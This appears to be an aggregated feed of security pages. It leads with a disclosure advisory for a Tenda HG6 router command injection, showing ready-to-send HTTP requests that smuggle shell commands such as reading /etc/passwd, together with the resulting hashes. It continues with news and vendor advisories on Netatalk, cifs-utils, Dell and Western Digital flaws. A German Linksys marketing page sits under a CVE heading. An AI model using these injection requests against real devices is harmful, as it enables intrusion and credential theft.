Tenda HG6 version 3.3.0 suffers from a remote command injection vulnerability. It can be exploited to inject and execute arbitrary shell commands through the pingAddr and traceAddr HTTP POST parameters in formPing, formPing6, formTracert and formTracert6 interfaces.

  
Tenda HG6 v3.3.0 Remote Command Injection Vulnerability

Vendor: Tenda Technology Co.,Ltd.  
Product web page: https://www.tendacn.com  
                  https://www.tendacn.com/product/HG6.html  
Affected version: Firmware version: 3.3.0-210926  
                  Software version: v1.1.0  
                  Hardware Version: v1.0  
                  Check Version: TD_HG6_XPON_TDE_ISP

Summary: HG6 is an intelligent routing passive optical network  
terminal in Tenda FTTH solution. HG6 provides 4 LAN ports(1*GE,3*FE),  
a voice port to meet users' requirements for enjoying the Internet,  
HD IPTV and VoIP multi-service applications.

Desc: The application suffers from an authenticated OS command injection  
vulnerability. This can be exploited to inject and execute arbitrary  
shell commands through the 'pingAddr' and 'traceAddr' HTTP POST parameters  
in formPing, formPing6, formTracert and formTracert6 interfaces.

Tested on: Boa/0.93.15

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2022-5706  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5706.php

22.04.2022

--

ping.asp:  
---------

POST /boaform/formPing HTTP/1.1  
Host: 192.168.1.1

pingAddr=;ls /etc&wanif=65535&submit-url=/ping.asp&postSecurityFlag=2564

---  
TZ  
app.gwdt  
bftpd.conf  
buildtime  
check_version.txt  
config  
config.csv  
config_default.xml  
config_default_hs.xml  
dhclient-script  
dnsmasq.conf  
ethertypes  
factory_default.xml  
ftpdpassword  
group  
hardversion  
inetd.conf  
init.d  
inittab  
innversion  
insdrv.sh  
irf  
mdev.conf  
omci_custom_opt.conf  
omci_ignore_mib_tbl.conf  
omci_ignore_mib_tbl_10g.conf  
omci_mib.cfg  
orf  
passwd  
ppp  
profile  
protocols  
radvd.conf  
ramfs.img  
rc_boot_dsp  
rc_voip  
release_date  
resolv.conf  
rtk_tr142.sh  
run_customized_sdk.sh  
runoam.sh  
runomci.sh  
runsdk.sh  
samba  
scripts  
services  
setprmt_reject  
shells  
simplecfgservice.xml  
smb.conf  
softversion  
solar.conf  
solar.conf.in  
ssl_cert.pem  
ssl_key.pem  
version  
wscd.conf

ping6.asp:  
----------

POST /boaform/formPing6 HTTP/1.1  
Host: 192.168.1.1

pingAddr=;ls&wanif=65535&go=Go&submit-url=/ping6.asp

---  
boa.conf  
web

tracert.asp:  
------------

POST /boaform/formTracert HTTP/1.1  
Host: 192.168.1.1

traceAddr=;pwd&trys=1&timeout=5&datasize=38&dscp=0&maxhop=10&go=Go&submit-url=/tracert.asp

---  
/home/httpd

tracert6.asp:  
-------------

POST /boaform/formTracert6 HTTP/1.1  
Host: 192.168.1.1

traceAddr=;cat /etc/passwd&trys=1&timeout=5&datasize=38&maxhop=10&go=Go&submit-url=/tracert6.asp

---  
admin:$1$$CoERg7ynjYLsj2j4glJ34.:0:0::/tmp:/bin/sh  
adsl:$1$$m9g7v7tSyWPyjvelclu6D1:0:0::/tmp:/bin/sh  
nobody:x:0:0::/tmp:/dev/null  
user:$1$$ex9cQFo.PV11eSLXJFZuj.:1:0::/tmp:/bin/sh

Tenda HG6 3.3.0 Remote Command Injection

QNAP and Synology say flaws in the Netatalk fileserver allow remote code execution and information disclosure.

Network attached storage (NAS) device vendors QNAP and Synology this week disclosed multiple critical vulnerabilities in an open source fileserver technology integrated into their products.

The vulnerabilities — several of which enable remote code execution (RCE) — exist in Netatalk, an open source version of Apple File Protocol fileserver for accessing network shares in multiple operating system environments. Both vendors are still working on updating all versions of their products that contain the vulnerability.

**Unpatched for Months**  
Security researchers working in coordination with the Zero Day Initiative (ZDI) reported a total of six vulnerabilities to the maintainers of Netatalk in December. Three of them are critical RCE bugs tied to buffer-overflow issues (CVE-2022-0194; CVE-2022-23122; CVE-2022-23125). Two of the flaws are medium-severity out-of-bounds information-disclosure vulnerabilities (CVE-2022-23124; CVE-2022-23123), and one is a critical RCE issue tied to improper handling of exceptional conditions (CVE-2022-23121).

Brian Gorenc, senior director of vulnerability research and head of ZDI at Trend Micro, tells Dark Reading that all the Netatalk bugs were first discovered at Pwn2Own Austin in November 2021.

Another flaw, a high-severity buffer-overflow related RCE (CVE-2021-31439), was disclosed to Netatalk's maintainers all the way back in March 2021.

The development team at Netatalk released an updated version of the software (Netatalk 3.1.13) on March 23 that addressed all seven of the vulnerabilities. The updated version is available for all currently supported operating systems: FreeBSD, Linux, OpenBSD, NetBSD, and Solaris and derivates.

However, it's a longer timeline for some vendors to roll the patches into their products. ZDI's Gorenc says that because Netatalk is a third-party component used by many NAS vendors, the vendors are responsible for monitoring for releases of Netatalk and integrating these releases into their products. "We are glad to see the NAS vendors updating their Netatalk deployments to resolve the vulnerabilities that were disclosed and fixed at Pwn2Own Austin," he says.

Western Digital is another vendor whose products were impacted by the flaws in Netatalk. But unlike Synology and QNAP, Western Digital proactively removed Netatalk from its products on Jan. 10, 2022, citing concerns over multiple critical vulnerabilities in the technology.

"Because Netatalk is unmaintained, we have removed Netatalk from our firmware released on January 10, 2022," the company announced in March. "Users can continue to access local network shares and perform Time Machine backup via SMB."

**Affected Devices**  
Synology's advisory described the vulnerabilities as critical and allowing remote attackers to steal sensitive data. Bad actors could potentially execute arbitrary code on NAS devices via a vulnerable version of its DiskStation Manager (DSM) and Synology Router Manager (SRM) technologies.

QNAP identified multiple versions of its QTS operating system as being vulnerable and said it is currently investigating the flaws. The company said that it's working on releasing updates to all impacted products, and it urged customers to install the updates as soon as they become available.

The Taiwan-based NAS manufacturer also outlined steps that organizations can take to mitigate the risk posed by the vulnerabilities while it works on fixes. QNAP's advisory identified CVE-2021-31439 — the flaw from last March — as one of the issues that it still needs to address in its products even though it was disclosed more than one year ago.

Both Synology and QNAP did not immediately respond to requests for comment from Dark Reading.

Critical Vulnerabilities Leave Some Network-Attached Storage Devices Open to Attack

NAS device vendors are dealing with several severe vulnerabilities in Netatalk, the open-source implemenation of AFP.
The post QNAP customers urged to disable AFP to protect against severe vulnerabilities appeared first on Malwarebytes Labs.

MacOS users that have a network-attached storage (NAS) device made by QNAP are being advised to disable the Apple Filing Protocol (AFP) on their devices until some severe vulnerabilities have been fixed. But QNAP is not the only vendor that needed to fix these vulnerabilities. Others have already done so, or have taken more drastic measures.

Taiwanese corporation QNAP has asked customers to disable the AFP file service protocol on its NAS appliances while it creates fixes for multiple, critical Netatalk vulnerabilities.

The vulnerabilities most urgently in need of mitigation or a fix are: CVE-2022-0194, CVE-2022-23121, CVE-2022-23122 and CVE-2022-23125. All of them are remote code execution (RCE) vulnerabilities, and all of them have a CVSS severity score of 9.8 out of 10.

In a security advisory, QNAP says it has fixed the Netatalk vulnerabilities for QTS 4.5.4.2012 build 20220419 and later, but it is still working to release security updates for all affected QNAP operating system versions. Given the severity of the vulnerabilities, keep an eye for updates.

**AFP and Netatalk**

A NAS device is a storage server connected to a computer network, storing data that can be accessed by a wide variety of devices, including Windows, macOS, and other systems. In real life this usually means they are used as an external hard-drive that can be accessed over an intranet or the Internet.

AFP is a proprietary network protocol, and part of the Apple File Service (AFS), that offers file services for macOS and the classic Mac OS. Many types of NAS devices support AFP so that macOS systems can access the data on them.

Netatalk is a free, open-source implementation of AFP that allows the Unix-like operating systems (that frequently power NAS devices) to serve as a file server for macOS systems.

Version 3.0 of Netatalk was released in July 2012. On  22nd of March 2022 the Netatalk team at Sourceforge announced Netatalk 3.1.13 with a new feature and several security updates.

**Not just QNAP**

Given the popularity of Netatalk, QNAP isn’t the only vendor that needs to deal with these vulnerabilities.

Another popular NAS device vendor, Synology, had issued Disk Station Manager version 7.1 to deal with the vulnerabilities. The update is expected to be available in all regions shortly but you can download it from the company’s website now if you want.

Western Digital removed Netatalk from its firmware, released on January 10, 2022. The company says that users can continue to access local network shares and perform Time Machine backups via SMB, a different file-sharing protocol.

TrueNAS says it fixed the vulnerabilities in TrueNAS Core 12.0-U8.1 on April 14, 2022.

**Mitigation**

Until an update has been made available, QNAP advises uses of affected devices to disable AFP and install security updates as soon as they become available.

To disable AFP on your QTS or QuTS hero NAS device, you will have to go to **Control Panel** > **Network & File Services** > **Win/Mac/NFS/WebDAV** > **Apple Networking** and select **Disable AFP (Apple Filing Protocol)**.

Stay safe, everyone!

QNAP customers urged to disable AFP to protect against severe vulnerabilities

cifs-utils through 6.14, with verbose logging, can cause an information leak when a file contains = (equal sign) characters but is not a valid credentials file.

**Conversation**

 

Previous check was true whatever the length of the input string was,
leading to a buffer overflow in the subsequent strcpy call.

Bug: https://bugzilla.samba.org/show\_bug.cgi?id=15025

Signed-off-by: Jeffrey Bencteux <jbe@improsec.com>
Reviewed-by: David Disseldorp <ddiss@suse.de>

 

When verbose logging is enabled, invalid credentials file lines may be
dumped to stderr. This may lead to information disclosure in particular
conditions when the credentials file given is sensitive and contains '='
signs.

Bug: https://bugzilla.samba.org/show\_bug.cgi?id=15026

Signed-off-by: Jeffrey Bencteux <jbe@improsec.com>
Reviewed-by: David Disseldorp <ddiss@suse.de>

mweinelt added a commit to mweinelt/nixpkgs that referenced this issue

Apr 28, 2022

github-actions bot pushed a commit to NixOS/nixpkgs that referenced this issue

Apr 29, 2022

 

gador pushed a commit to gador/nixpkgs that referenced this issue

May 3, 2022

CVE-2022-29869: mount.cifs: two bug fixes by ddiss · Pull Request #7 · piastry/cifs-utils

Linksys MR9600 devices before 2.0.5 allow attackers to read arbitrary files via a symbolic link to the root directory of a NAS SMB share.

**Merkmale**

**Die Zukunft beginnt mit der Intelligent Mesh™-Technologie und WiFi 6 jetzt schon.**

Der Linksys MR9600 ist ein extrem leistungsstarker Dual-Band WiFi 6 Router – perfekt für all diejenigen, die sich echte Gigabit-Geschwindigkeiten, eine höhere Reichweite und überall zu Hause genug Power zum Gamen wünschen. Mit Linksys Intelligent Mesh™-Technologie und Datenübertragungsraten von 6 Gbit/s ist er 4x schneller als WiFi 5 Router, verhindert Funklöcher und isoliert Ihr Netzwerk, um Störungen zu vermeiden. Mit diesem zukunftssicheren Router können Sie Ihr Netzwerk bei Bedarf erweitern, indem Sie Produkte hinzufügen, die mit dem Mesh-System von Linksys kompatibel sind. Mit der Linksys App lässt sich der MR9600 mühelos einrichten, sodass Sie in wenigen Minuten 8K-Videos streamen können.

**Mehr Kapazität für mehr Geräte**

WiFi 6 sendet und empfängt mehrere Datenströme gleichzeitig und sorgt für eine 4-mal höhere WLAN-Kapazität, um jedem Mobil-, Streaming-, Gaming- und Smart-Home-Gerät in Ihrem Netzwerk gerecht zu werden.

**Keine Funklöcher mehr**

Intelligent Mesh™-Technologie sorgt in Kombination mit WiFi 6 überall bei Ihnen Zuhause für WLAN-Geschwindigkeiten im Gigabit-Bereich – auch im Garten und auf Smart-Home-Geräten im Außenbereich.

**EINFACHE EINRICHTUNG UND BEDIENUNG**

Über die Linksys App erfolgt das Setup im Nu und Sie können von überall aus einfach auf Ihr Netzwerk zugreifen. Es ist zudem möglich, einzustellen, welche verbundenen Geräte die höchste Bandbreite im WLAN erhalten.

**Verringert WLAN-Überlastung**

Verhindert mithilfe der technisch ausgereiften WiFi 6-Technologie, die Ihr Netzwerk isolieren, Überlastung reduzieren und für das stärkste, klarste WLAN-Signal sorgen kann, Störungen durch benachbarte Netzwerke.

**Smartere Sicherheitsfunktionen**

Ihr Netzwerk ist dank der automatischen Software-Updates, Kinderschutzfunktionen und separatem Gastzugriff immer sicher und auf dem neuesten Stand.

**100 % abwärtskompatibel**

Funktioniert mit allen vorhandenen WLAN-fähigen Geräten wie Tablets, Laptops, Smart-Home- und Streaming-Geräten.

**Linksys App**

**Jederzeit und von überall aus haben Sie Ihr WLAN zu Hause voll im Griff**

Die Linksys App bietet Ihnen über Ihr Smartphone oder Tablet Remote-Zugriff auf Ihr WLAN zu Hause, sodass Sie es immer kontrollieren und verwalten können.

*   **Gastzugriff:** Richten Sie ein separates, passwortgeschütztes WLAN-Netzwerk für bis zu 50 Gäste ein und teilen Sie ihnen das Passwort bequem mit.
*   **Kinderschutzfunktionen:** Sorgen Sie für einen geschützten Internetzugang Ihrer Kinder, auch wenn Sie nicht vor Ort sind. Beschränken Sie den Zugang zu unangemessenen Inhalten oder Websites, die ablenken könnten, kontrollieren Sie die Nutzung und blockieren Sie den Internetzugang bestimmter Geräte.
*   **Gerätepriorisierung:** Geben Sie den Geräten, die die höchste Geschwindigkeit benötigen, den Vorrang.
*   **Geschwindigkeitstest:** Die Geschwindigkeit Ihrer Internetverbindung lässt sich einfach überprüfen und kontrollieren.

**Schnelles und einfaches Setup**

Die Verwaltung Ihres WLANs zu Hause erfolgt mit der Linksys App schnell und einfach:

 

****Laden Sie die Linksys App herunter****

 

 

****Stellen Sie eine Verbindung mit Ihrem Modem her****

 

****Geben Sie Ihrem WLAN einen Namen und erstellen Sie ein Passwort****

CVE-2022-24372: Linksys Dual-Band Mesh-WLAN WiFi 6 Router (MR9600)

In cifs-utils through 6.14, a stack-based buffer overflow when parsing the mount.cifs ip= command-line argument could lead to local attackers gaining root privileges.

CVE-2022-27239: Linux CIFS Utils and Samba - Free Knowledge Base

Organizations can defend themselves from future unknows attacks by implementing targeted security hardening measures, turning on built-in security protections, and leveraging existing technology stack to achieve microsegmentation and credential hygiene.

Black swan events are considered incidents with high impact and low frequency that are impossible to predict. Whether you consider them black swan cyber events or not, the SolarWinds attack and the Log4Shell exploit stressed some of the key ways in which organizations can prepare themselves and prevent crises.  

Here are three common misconceptions around prevention of such events. 

**Misconception No. 1: There's nothing we can do about zero days and supply-chain attacks.**

One of the common misconceptions is that it's almost impossible to protect environments from critical zero-day vulnerabilities or supply-chain attacks, as they are highly stealthy and cannot be predicted. At best, this misconception will shift efforts toward enhancing the detection and response capabilities. At worst, it will promote a sense of helplessness when dealing with such events.

Contrary to common perception, these events are not the "unknown unknowns." Organizations can deploy and adjust their defenses strategically, often using their existing teams and security stack, and protect themselves from such attacks.

A simple yet powerful example is preventing egress Internet traffic from servers. Even though it may sound like a basic security practice, real-world experience demonstrates that it's not implemented by even relatively mature organizations.

Blocking servers from reaching out to the Internet will prevent attacks (or dramatically slow down attackers), where the exploit depends on the server to initiate connection to the attacker's command and control infrastructure, whether through reverse shells, malicious code in a third-party software such as SolarWinds, or a vulnerability such as Log4Shell. This leads us to the realization that even a basic security control can stop both the SolarWinds supply chain attack, one of the most sophisticated attacks in recent years, as well as mitigate the Log4Shell vulnerability, one of the most potent and ubiquitous vulnerabilities discovered recently.

Investigating and learning common tactics, techniques, and procedures (TTPs) and modus operandi of the latest breaches and exploits can provide organizations with valuable insights on how to improve and prioritize defenses in a way that will mitigate the use of future exploits.

**Misconception No. 2: Once attackers infiltrate an environment, they will fully compromise it.  
**Another misconception is that these novel exploits will inevitably allow attackers to do more than just infiltrate the perimeter.

Targeted security enhancement initiatives can be implemented to make the environment much more resilient to lateral movement and privilege escalation techniques, keeping attackers at bay, not able to leverage their initial footholds to gain access to core assets. This approach will also provide defenders with more time to detect and eliminate attacks in their early stages.

*   **Lateral** **m****ovement:** Microsegmentation is a daunting task. Many organizations procrastinate on implementing such projects as they require mapping all internal traffic, creating granular allow-lists of ports and hosts, buying expensive solutions, and investing crucial resources in deploying and then maintaining such environments. However, many of the advantages of microsegmentation can be achieved without going the full distance.
    
    Restricting ingress traffic on interactive (e.g., RDP, SSH) and noninteractive (e.g., SMB, WinRM, RPC) management protocols, by using host-based firewall policies on both servers and workstations, and then limiting management traffic to specific dedicated segments or jump boxes, can help achieve the core value provided by microsegmentation.
    
    While sometimes traffic on noninteractive management protocols toward servers is required for operational or applicative purposes, in many cases it's not required between different workstations or between servers in the DMZ. Adopting a focused deny-list approach at first will yield an immediate risk reduction, to a point where it will gradually become very challenging to move laterally within the network.
    

*   **Privilege** **e****scalation****:** One of the major challenges in reducing the risk of materializing attacks in the network is credential hygiene and prevention of privilege escalation. Nevertheless, similar to the approach taken above, focusing on high-value measures derived from real-world use of known and common TTPs can provide significant value for defenders.
    
    To achieve this, constantly search for exposed clear-text credentials, set long and complex passwords for service accounts, avoid using domain admin accounts for daily activities, and use built-in Microsoft security features such as Protected Users, LAPS, LSA Protection, and Credential Guard.
    
    Credential hygiene issues are a major contributing factor in almost every single attack that Sygnia responded to in the last couple of years. Securing privileged identities should be top priority in any security road map for 2022.
    

**Misconception No. 3: Patching is the only solution we have for novel vulnerabilities.  
**Often when a new vulnerability is published, the main (and sometimes the only) recommendation suggested by numerous advisories is patching, as if patching is the only action organizations can initiate to contain the risk. Patching is crucial, but it can take time for large enterprises to fully understand their exposure and apply patches in production environments. Occasionally, a few days after patching, new vulnerabilities are discovered by the security industry because of the attention the system or the application is drawing. Patching will not always mitigate all gaps.

Understanding the way in which the exploit is executed — and the dependencies on which the exploit is relying to execute — is imperative in responding to such events. What may be considered as only a workaround to mitigate the vulnerability can sometimes prove to be a lifesaver for organizations.

**Leverage and Optimize Your Security Stack  
**Contrary to common belief, organizations _can_ prevent or reduce the impact of novel exploits such as Log4Shell or highly sophisticated attacks like SolarWinds.

This can be achieved by organizations leveraging _and_ optimizing their current security stack, implementing surgical hardening measures, and using built-in security features that can be turned on easily without requiring additional spend.

The Misconceptions of 2021's Black Swan Cyber Events

Dell PowerScale OneFS versions 8.2.x - 9.3.0.x contain a denial-of-service vulnerability in SmartConnect. An unprivileged network attacker may potentially exploit this vulnerability, leading to denial-of-service.

**Vaikutus**

Critical

**Overview**

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2022-24411

Dell PowerScale OneFS 8.2.2 and later contain an elevation of privilege vulnerability. A local attacker with ISI\_PRIV\_LOGIN\_SSH and/or ISI\_PRIV\_LOGIN\_CONSOLE may potentially exploit this vulnerability, leading to elevation of privilege. This may potentially allow users to circumvent PowerScale Compliance Mode guarantees.

7.8

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2022-24412

Dell EMC PowerScale OneFS 8.2.x - 9.3.0.x contain an improper handling of value vulnerability. An unauthenticated remote attacker may potentially exploit this vulnerability, leading to denial-of-service.

7.5

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2022-23161

Dell PowerScale OneFS versions 8.2.x - 9.3.0.x contain a denial-of-service vulnerability in SmartConnect. An unprivileged network attacker may potentially exploit this vulnerability, leading to denial-of-service.

7.5

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2022-23160

Dell PowerScale OneFS 8.2.x - 9.3.0 contain an Improper Handling of Insufficient Permissions vulnerability. An remote malicious user may potentially exploit this vulnerability, leading to gaining write permissions on read-only files. 

5.4

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

CVE-2022-23159

Dell PowerScale OneFS 8.2.x - 9.3.0.x contain a missing release of memory after effective lifetime vulnerability. An authenticated user with ISI\_PRIV\_LOGIN\_SSH and/or ISI\_PRIV\_LOGIN\_CONSOLE and ISI\_PRIV\_AUTH\_PROVIDERS privileges may potentially exploit this vulnerability, leading to a Denial-Of-Service. This can also impact a cluster in Compliance mode. Dell recommends to update at the earliest opportunity.

4.8

CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:N/A:H

CVE-2022-23163

Dell PowerScale OneFS 8.2.x - 9.3.0.x contain a denial of service vulnerability. A local attacker with minimal privileges may potentially exploit this vulnerability, leading to denial of service/data unavailability.

4.7

CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2022-24413

Dell PowerScale OneFS 8.2.2-9.3.x contain a time-of-check-to-time-of-use vulnerability. A local user with access to the filesystem may potentially exploit this vulnerability, leading to data loss.

4.4

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

 

**Third-Party Component**

**CVE**

**More information**

Apache Portable Runtime

CVE-2017-12613

CVE-2021-35940

Dell Technologies suosittelee, että kaikki asiakkaat ottavat huomioon sekä CVSS-peruspistemäärän että kaikki asiaankuuluvat väliaikaiset ja ympäristöön liittyvät pisteet, jotka voivat vaikuttaa tietyn tietoturvahaavoittuvuuden mahdolliseen vakavuuteen.

**Tuotteet, joihin asia vaikuttaa ja tilanteen korjaaminen**

**CVEs Addressed** 

**Affected Versions**

**Updated Versions**

**Link to Update**

CVE-2022-24411

8.2.2, 9.0.0, 9.1.1.x, and 9.2.0.x.

Upgrade your version of OneFS

PowerScale OneFS Downloads Area

9.1.0.x, 9.2.1.x, and 9.3.0.x.

Download and install the latest RUP

CVE-2022-24412

8.2.2, 9.0.0, 9.1.1.x, and 9.2.0.x.

Upgrade your version of OneFS

9.1.0.x, 9.2.1.x, and 9.3.0.x.

Download and install the latest RUP

CVE-2022-23161

8.2.2, 9.0.0, 9.1.1.x, and 9.2.0.x.

Upgrade your version of OneFS

9.1.0.x, 9.2.1.x, and 9.3.0.x.

Download and install the latest RUP

CVE-2017-12613

8.2.2, 9.0.0, 9.1.1.x, and 9.2.0.x.

Upgrade your version of OneFS

9.1.0.x, 9.2.1.x, and 9.3.0.x.

Download and install the latest RUP

CVE-2022-23160

8.2.2, 9.0.0, 9.1.1.x, and 9.2.0.x.

Upgrade your version of OneFS

9.1.0.x, 9.2.1.x, and 9.3.0.x.

Download and install the latest RUP

CVE-2022-23159

8.2.2, 9.0.0, 9.1.1.x, and 9.2.0.x.

Upgrade your version of OneFS

9.1.0.x, 9.2.1.x, and 9.3.0.x.

Download and install the latest RUP

CVE-2022-23163

8.2.2, 9.0.0, 9.1.1.x, and 9.2.0.x.

Upgrade your version of OneFS

9.1.0.x, 9.2.1.x, and 9.3.0.x.

Download and install the latest RUP

CVE-2022-24413

8.2.2, 9.0.0, 9.1.1.x, and 9.2.0.x.

Upgrade your version of OneFS

9.1.0.x, 9.2.1.x, and 9.3.0.x.

Download and install the latest RUP

**CVEs Addressed** 

**Affected Versions**

**Updated Versions**

**Link to Update**

CVE-2022-24411

8.2.2, 9.0.0, 9.1.1.x, and 9.2.0.x.

Upgrade your version of OneFS

PowerScale OneFS Downloads Area

9.1.0.x, 9.2.1.x, and 9.3.0.x.

Download and install the latest RUP

CVE-2022-24412

8.2.2, 9.0.0, 9.1.1.x, and 9.2.0.x.

Upgrade your version of OneFS

9.1.0.x, 9.2.1.x, and 9.3.0.x.

Download and install the latest RUP

CVE-2022-23161

8.2.2, 9.0.0, 9.1.1.x, and 9.2.0.x.

Upgrade your version of OneFS

9.1.0.x, 9.2.1.x, and 9.3.0.x.

Download and install the latest RUP

CVE-2017-12613

8.2.2, 9.0.0, 9.1.1.x, and 9.2.0.x.

Upgrade your version of OneFS

9.1.0.x, 9.2.1.x, and 9.3.0.x.

Download and install the latest RUP

CVE-2022-23160

8.2.2, 9.0.0, 9.1.1.x, and 9.2.0.x.

Upgrade your version of OneFS

9.1.0.x, 9.2.1.x, and 9.3.0.x.

Download and install the latest RUP

CVE-2022-23159

8.2.2, 9.0.0, 9.1.1.x, and 9.2.0.x.

Upgrade your version of OneFS

9.1.0.x, 9.2.1.x, and 9.3.0.x.

Download and install the latest RUP

CVE-2022-23163

8.2.2, 9.0.0, 9.1.1.x, and 9.2.0.x.

Upgrade your version of OneFS

9.1.0.x, 9.2.1.x, and 9.3.0.x.

Download and install the latest RUP

CVE-2022-24413

8.2.2, 9.0.0, 9.1.1.x, and 9.2.0.x.

Upgrade your version of OneFS

9.1.0.x, 9.2.1.x, and 9.3.0.x.

Download and install the latest RUP

**Keinoja ongelman kiertämiseen tai lieventämiseen**

**CVEs addressed**

**Workaround or Mitigation**

CVE-2022-24411

none

CVE-2022-24412

Disable netbios support if enabled (default setting: disabled):

1.  Open an SSH connection on any node in the cluster and log on using the "root" account.
2.  Run the following command:

#isi smb settings global modify --support-netbios no

3.  To verify that the service is disabled, run the following command:

#isi smb settings global view | grep NetBIOS

If the service is disabled, the following output is displayed:

#Support NetBIOS: No

CVE-2022-23161

Configure a valid FQDN in the SmartConnect service name field for every SmartConnect subnet on the cluster:

#isi network subnets modify <subnet> --sc-service-name cluster-sc.example.com

CVE-2017-12613

none

CVE-2022-23160

Configure SMB share permissions of any SyncIQ target directory to prevent writes.

CVE-2022-23159

none

CVE-2022-23163

none

CVE-2022-24413

none

**Versiohistoria**

**Revision**

**Date**

**Description**

1.0

2022-03-03

Initial

1.1

2022-03-04

Corrected Impact

**Asiaan liittyvät tiedot**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

12 heinäk. 2022

CVE-2022-23161: DSA-2022-024: Dell EMC PowerScale OneFS Security Update for Multiple Vulnerabilities

The combination of primitives offered by SMB and AFP in their default configuration allows the arbitrary writing of files. By exploiting these combination of primitives, an attacker can execute arbitrary code.

**WDC Tracking Number:** WDC-22005  
**Published:** March 24, 2022

**Last Updated:** March 24, 2022

**Description**

Netatalk is an open-source Apple File Protocol fileserver that was being used by Western Digital products to access network shares and perform Time Machine backups. Multiple critical vulnerabilities have been discovered in Netatalk. Because Netatalk is unmaintained, we have removed Netatalk from our firmware released on January 10, 2022. Users can continue to access local network shares and perform Time Machine backup via SMB. For additional information, please refer to this KBA.

To take advantage of the latest security fixes, Western Digital recommends that users promptly update their devices to the latest firmware by clicking on the firmware update notification.

**Product Impact**

**Minimum Fix Version**

**Last Updated**

My Cloud PR2100

5.19.117

January 10, 2022

My Cloud PR4100

5.19.117

January 10, 2022

My Cloud EX4100

5.19.117

January 10, 2022

My Cloud EX2 Ultra

5.19.117

January 10, 2022

My Cloud Mirror Gen 2

5.19.117

January 10, 2022

My Cloud DL2100

5.19.117

January 10, 2022

My Cloud DL4100

5.19.117

January 10, 2022

My Cloud EX2100

5.19.117

January 10, 2022

My Cloud

5.19.117

January 10, 2022

WD Cloud

5.19.117

January 10, 2022

My Cloud Home

7.16-220

January 10, 2022

**Advisory Summary**

A stack-based buffer overflow vulnerability was discovered within the ad\_addcomment function that could lead to an unauthenticated remote code execution. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer.

**CVE Number:** CVE-2022-0194

**Reported By:** Theori (@theori\_io) working with Trend Micro’s Zero Day Initiative

An improper handling of exceptional conditions issue was found in the parse\_entries function that did not properly handle parsing AppleDouble entries. This vulnerability could allow a remote attacker to carry out an unauthenticated remote command execution on affected versions of Netatalk.

**CVE Number:** CVE-2022-23121

**Reporteb By:** NCC Group EDG (Alex Plaskett, Cedric Halbronn, Aaron Adams) working with Trend Micro’s Zero Day Initiative

A stack-based buffer overflow vulnerability was discovered within the setfilparams function that could lead to an unauthenticated remote code execution. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer.

**CVE Number:** CVE-2022-23122

**Reported By:** Orange Tsai (@orange\_8361) from DEVCORE Research Team working with Trend Micro’s Zero Day Initiative

An out-of-bounds read information disclosure vulnerability was discovered in the getdirparams method that could allow an attacker to disclose sensitive information or carry out an unauthenticated remote code execution on the device. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer.

**CVE Number:** CVE-2022-23123

**Reported By:** Orange Tsai (@orange\_8361) from DEVCORE Research Team working with Trend Micro’s Zero Day Initiative

An out-of-bounds read information disclosure vulnerability was discovered in the get\_finderinfo method that could allow an attacker to disclose sensitive information or carry out an unauthenticated remote code execution on the device. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer.

**CVE Number:** CVE-2022-23124

**Reported By:** Theori (@theori\_io) working with Trend Micro’s Zero Day Initiative

A stack-based buffer overflow vulnerability was discovered within the copyapplfile function that could lead to an unauthenticated remote code execution. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer.

**CVE Number:** CVE-2022-23125

**Reported By:** Theori (@theori\_io) working with Trend Micro’s Zero Day Initiative

The combination of primitives offered by SMB and AFP in their default configuration allows the arbitrary writing of files. By exploiting these combination of primitives, an attacker can execute arbitrary code.

**CVE Number:** CVE-2022-22995

**Reported By:** Corentin BAYET (@OnlyTheDuck), Etienne HELLUY-LAFONT and Luca MORO (@johncool\_\_) from Synacktiv working with Trend Micro’s Zero Day Initiative

*      
    
    {{ skuObj.title.length < 15 ? skuObj.title : skuObj.title.substring(0,14) + "..." }}

Tag

#samba